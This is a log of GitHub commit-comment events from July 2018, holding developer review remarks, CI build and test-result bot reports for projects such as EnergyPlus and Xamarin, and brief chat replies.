{"id":"7961196963","type":"CommitCommentEvent","actor":{"login":"proogrammer"},"repo":{"name":"proogrammer/WinConsoleGameEngine"},"payload":{"comment":{"id":29697514,"position":42,"line":71,"path":"ConsoleTetris/ConsoleEngine/gamemanager/gamemanger.cpp","commit_id":"d90a92e0e1c99c7a4a43b876504043b57171f1eb","created_at":"2018-07-13T09:54:18Z","updated_at":"2018-07-13T09:54:18Z","author_association":"OWNER","body":"- 참조 에러 수정 -\r\n\r\nquecount는 앞으로 추가되어야할 오브젝트가 있다면, 배정 해야할 인덱스를 가르키는 곳이므로, \r\n\r\nmapInstance->changeMapIndex(TERRAIN_STATE_PLAYER, gameObjectList[queCount]->pos.x, gameObjectList[queCount]->pos.y);\r\ngameObjectList[queCount]->targetMap = mapInstance;\r\n\r\n등의 코드는 quecount++; 이전에 실행 시켜야 함"}},"created_at":"2018-07-13T09:54:18Z"}
{"id":"7961199174","type":"CommitCommentEvent","actor":{"login":"chapmanb"},"repo":{"name":"bcbio/bcbio-nextgen"},"payload":{"comment":{"id":29697519,"position":null,"line":null,"path":null,"commit_id":"08bb552975e51f7e176b44e0ad30513b1b677c37","created_at":"2018-07-13T09:54:44Z","updated_at":"2018-07-13T09:54:44Z","author_association":"MEMBER","body":"Vlad;\r\nGreat catch, thanks for reading this so carefully and sorry for my mistake. I hadn't realized there were these different MultiQC summarization steps happening within the report generation. I re-instated the ones that looked like they'd get picked up by MultiQC:\r\n\r\nhttps://github.com/bcbio/bcbio-nextgen/commit/737a44f289edd95b9d4a0c852c4936e4a03e05ca\r\n\r\nPlease let me know if I missed anything and we can re-add any other needed parts. Thanks again."}},"created_at":"2018-07-13T09:54:44Z"}
{"id":"7961199376","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29697520,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-13T09:54:46Z","updated_at":"2018-07-13T09:54:46Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T09:54:46Z"}
{"id":"7961206154","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29697529,"position":null,"line":null,"path":null,"commit_id":"a49c6f7c5c0338dca42edd4125de8c079a68d2fd","created_at":"2018-07-13T09:56:08Z","updated_at":"2018-07-13T09:56:08Z","author_association":"MEMBER","body":"@readroberts some flake8 errors in this file.\r\n```\r\nTests/tx_test.py:179:80: E501 line too long (80 > 79 characters)\r\nTests/tx_test.py:182:46: E231 missing whitespace after ','\r\n```"}},"created_at":"2018-07-13T09:56:08Z"}
{"id":"7961211311","type":"CommitCommentEvent","actor":{"login":"ayushsuhane"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29697537,"position":null,"line":null,"path":null,"commit_id":"6e0ceda1901e1d768ea1ed457370fb5ea1033ca2","created_at":"2018-07-13T09:57:07Z","updated_at":"2018-07-13T09:57:07Z","author_association":"NONE","body":"Oh cool. Ok. I didn't knew this caveat about Valgrind. \r\n\r\nWow, I think its already better. From the benchmarks, its clearly a good method for atoms selections as well as opposed to the tree structures. The primary goal, therefore, is to include this in the codebase which can be followed by the improvements. Also the structure of the module looks self-consistent to include directly in selections/ distance calculations. Since the PR is already opened, would you mind me working on the docs and tests and try to include the current code into the codebase. The improved version without malloc can replace it afterwards. However, if incase you are already building a PR for it, I can also help you with other bits of the module.  Let me know."}},"created_at":"2018-07-13T09:57:07Z"}
{"id":"7961212785","type":"CommitCommentEvent","actor":{"login":"narendrakumardangeti"},"repo":{"name":"narendrakumardangeti/ServiceVirtualisation"},"payload":{"comment":{"id":29697539,"position":null,"line":null,"path":null,"commit_id":"2cb213041260b7a8723eeed1add14e25292f1af7","created_at":"2018-07-13T09:57:24Z","updated_at":"2018-07-13T09:57:24Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-13T09:57:24Z"}
{"id":"7961213611","type":"CommitCommentEvent","actor":{"login":"kirilkirkov"},"repo":{"name":"kirilkirkov/Shopping-Cart-Solution-CodeIgniter"},"payload":{"comment":{"id":29697541,"position":null,"line":null,"path":null,"commit_id":"552cbc73fdd498db34bd96aa55ae03820d0b2255","created_at":"2018-07-13T09:57:34Z","updated_at":"2018-07-13T09:57:34Z","author_association":"OWNER","body":"@anand1100 yess"}},"created_at":"2018-07-13T09:57:34Z"}
{"id":"7961220699","type":"CommitCommentEvent","actor":{"login":"felipemoran"},"repo":{"name":"felipemoran/charlie-parser"},"payload":{"comment":{"id":29697547,"position":null,"line":null,"path":null,"commit_id":"ba1743a43cef207955ff38a0557fe6fe72ff8a82","created_at":"2018-07-13T09:58:57Z","updated_at":"2018-07-13T09:58:57Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/982e7a50-e315-4261-922d-0d17d409650a?env_id=ibm%3Ayp%3Aeu-gb \"parser_toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/303e7bd5-1a3f-438b-a677-cd784adfe953?env_id=ibm%3Ayp%3Aeu-gb \"charlie-parser-pipeline\") deployed [charlie-parser](https://github.com/felipemoran/charlie-parser/releases/tag/deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180713-095855 \"deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180713-095855\") to [test](https://console.bluemix.net/apps/ed23b9e2-0bb6-4aaf-a971-b58004b7683a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:felipe.moran-correa-meyer:test\"), including this commit"}},"created_at":"2018-07-13T09:58:57Z"}
{"id":"7961223578","type":"CommitCommentEvent","actor":{"login":"YexiaobaiandJie"},"repo":{"name":"YexiaobaiandJie/my_1_rep"},"payload":{"comment":{"id":29697557,"position":null,"line":null,"path":null,"commit_id":"341bc42d189da615827c26013f8e2ae47375bb1a","created_at":"2018-07-13T09:59:32Z","updated_at":"2018-07-13T09:59:32Z","author_association":"OWNER","body":"background"}},"created_at":"2018-07-13T09:59:32Z"}
{"id":"7964857371","type":"CommitCommentEvent","actor":{"login":"kirue129"},"repo":{"name":"kirue129/portfolio"},"payload":{"comment":{"id":29706837,"position":null,"line":null,"path":null,"commit_id":"d1239159ea50667934e225503d45c8382f5a34da","created_at":"2018-07-14T00:04:20Z","updated_at":"2018-07-14T00:04:20Z","author_association":"OWNER","body":"#13 "}},"created_at":"2018-07-14T00:04:20Z"}
{"id":"7964859790","type":"CommitCommentEvent","actor":{"login":"rybston"},"repo":{"name":"rybston/kafelki"},"payload":{"comment":{"id":29706841,"position":null,"line":null,"path":null,"commit_id":"26bbb1f565eb9f952d2fe05cd2c85fca59dbd209","created_at":"2018-07-14T00:05:27Z","updated_at":"2018-07-14T00:05:27Z","author_association":"OWNER","body":"no i tak jest dobrze!"}},"created_at":"2018-07-14T00:05:27Z"}
{"id":"7964860892","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29706842,"position":null,"line":null,"path":null,"commit_id":"e944b5820636b17213a1db157483de8a2657cb0a","created_at":"2018-07-14T00:05:57Z","updated_at":"2018-07-14T00:05:57Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85/display/redirect) (on internal Jenkins) failed in stage 'Running XM tests on '10.9'' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.12 failed (introspection)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e944b5820636b17213a1db157483de8a2657cb0a/85/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e944b5820636b17213a1db157483de8a2657cb0a/85/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e944b5820636b17213a1db157483de8a2657cb0a/85/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Xamarin.Mac tests on macOS 10.12 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.8 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.11 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.10 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.7 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.9 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/85/display/redirect) 🔥\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e944b5820636b17213a1db157483de8a2657cb0a/85/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n150 tests failed, 11 tests passed.\n\n## Failed tests\n\n * monotouch-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * MTouch tests/NUnit: TimedOut (Execution timed out after 0 minutes.)\n"}},"created_at":"2018-07-14T00:05:57Z"}
{"id":"7964864246","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706847,"position":null,"line":null,"path":null,"commit_id":"bb7f0ff864df4668cca79a066871fc4938d14662","created_at":"2018-07-14T00:07:29Z","updated_at":"2018-07-14T00:07:29Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - x86_64-MacOS-10.9-clang: OK (2939 of 2940 tests passed, 116 test warnings)\n\nMessages:\n\n * 97 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 16 tests had: Table small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 648\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bb7f0ff864df4668cca79a066871fc4938d14662-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bb7f0ff864df4668cca79a066871fc4938d14662-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T00:07:29Z"}
{"id":"7964865762","type":"CommitCommentEvent","actor":{"login":"bloodforblood"},"repo":{"name":"bloodforblood/encryptioncodes"},"payload":{"comment":{"id":29706852,"position":null,"line":null,"path":null,"commit_id":"f527193f5fa8c2c0b33136e90d9ecaabfb7e1103","created_at":"2018-07-14T00:08:16Z","updated_at":"2018-07-14T00:08:16Z","author_association":"OWNER","body":"[graphene-2.1.2.tar.gz](https://github.com/bloodforblood/encryptioncodes/files/2194496/graphene-2.1.2.tar.gz)\r\n[aseprite-master.zip](https://github.com/bloodforblood/encryptioncodes/files/2194497/aseprite-master.zip)\r\n"}},"created_at":"2018-07-14T00:08:16Z"}
{"id":"7964867378","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29706856,"position":4,"line":4,"path":"pandas/0047_hhpz/0169_will.txt","commit_id":"ab4adee3f1703393f24c7433cb9b9288e264f31f","created_at":"2018-07-14T00:09:08Z","updated_at":"2018-07-14T00:09:08Z","author_association":"CONTRIBUTOR","body":"Smithsonian Conservation Biology Institute"}},"created_at":"2018-07-14T00:09:08Z"}
{"id":"7964869071","type":"CommitCommentEvent","actor":{"login":"pedrofwanderley"},"repo":{"name":"pedrofwanderley/JogoUno_Logico"},"payload":{"comment":{"id":29706860,"position":null,"line":null,"path":null,"commit_id":"ab2dff4a8bcf4e199fdaa79f5d519f35f362ab64","created_at":"2018-07-14T00:10:01Z","updated_at":"2018-07-14T00:10:01Z","author_association":"OWNER","body":"VAleu m0ral, noixxxx\n\n2018-07-13 17:24 GMT-03:00 lucasanthony <notifications@github.com>:\n\n> muito bom\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pedrofwanderley/JogoUno_Logico/commit/ab2dff4a8bcf4e199fdaa79f5d519f35f362ab64#commitcomment-29704928>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATvl6ylEoybjDnbYDsCu4MECAWo8aYKFks5uGQIGgaJpZM4VPdmz>\n> .\n>\n"}},"created_at":"2018-07-14T00:10:01Z"}
{"id":"7964869534","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29706861,"position":3,"line":3,"path":"pandas/0047_hhpz/0170_gaila.txt","commit_id":"ab4adee3f1703393f24c7433cb9b9288e264f31f","created_at":"2018-07-14T00:10:14Z","updated_at":"2018-07-14T00:10:14Z","author_association":"CONTRIBUTOR","body":"2011/6/5"}},"created_at":"2018-07-14T00:10:14Z"}
{"id":"7964870292","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29706867,"position":4,"line":4,"path":"pandas/0047_hhpz/0170_gaila.txt","commit_id":"ab4adee3f1703393f24c7433cb9b9288e264f31f","created_at":"2018-07-14T00:10:36Z","updated_at":"2018-07-14T00:10:36Z","author_association":"CONTRIBUTOR","body":"Smithsonian Conservation Biology Institute"}},"created_at":"2018-07-14T00:10:36Z"}
{"id":"7964874130","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706880,"position":31,"line":31,"path":"Sources/Layout/TypingMessageSizeCalculator.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:12:34Z","updated_at":"2018-07-14T00:12:34Z","author_association":"MEMBER","body":"I'm definitely weary of this. Invalidating the layout is a major side effect"}},"created_at":"2018-07-14T00:12:34Z"}
{"id":"7964875505","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706885,"position":43,"line":43,"path":"Sources/Layout/TypingMessageSizeCalculator.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:13:20Z","updated_at":"2018-07-14T00:13:20Z","author_association":"MEMBER","body":"Width should be the width of the `collectionView`, no? The typing indicator is in a cell"}},"created_at":"2018-07-14T00:13:20Z"}
{"id":"7964876563","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706888,"position":14,"line":69,"path":"Sources/Protocols/MessagesDisplayDelegate.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:13:52Z","updated_at":"2018-07-14T00:13:52Z","author_association":"MEMBER","body":"Not sure about this being a delegate. Maybe a property would be better?"}},"created_at":"2018-07-14T00:13:52Z"}
{"id":"7964877266","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29706890,"position":4,"line":4,"path":"pandas/0047_hhpz/0169_will.txt","commit_id":"ab4adee3f1703393f24c7433cb9b9288e264f31f","created_at":"2018-07-14T00:14:14Z","updated_at":"2018-07-14T00:14:14Z","author_association":"CONTRIBUTOR","body":"Bronx Zoo"}},"created_at":"2018-07-14T00:14:14Z"}
{"id":"7964877875","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706891,"position":33,"line":33,"path":"Sources/Views/Cells/TypingBubbleCell.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:14:35Z","updated_at":"2018-07-14T00:14:35Z","author_association":"MEMBER","body":"Any reason why this cell needs a `MessageContainerView`? 🤔 "}},"created_at":"2018-07-14T00:14:35Z"}
{"id":"7964878973","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706893,"position":54,"line":54,"path":"Sources/Views/Cells/TypingBubbleCell.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:15:12Z","updated_at":"2018-07-14T00:15:12Z","author_association":"MEMBER","body":"Don't you think these views would be better added to another class like `TypingIndicator`?"}},"created_at":"2018-07-14T00:15:12Z"}
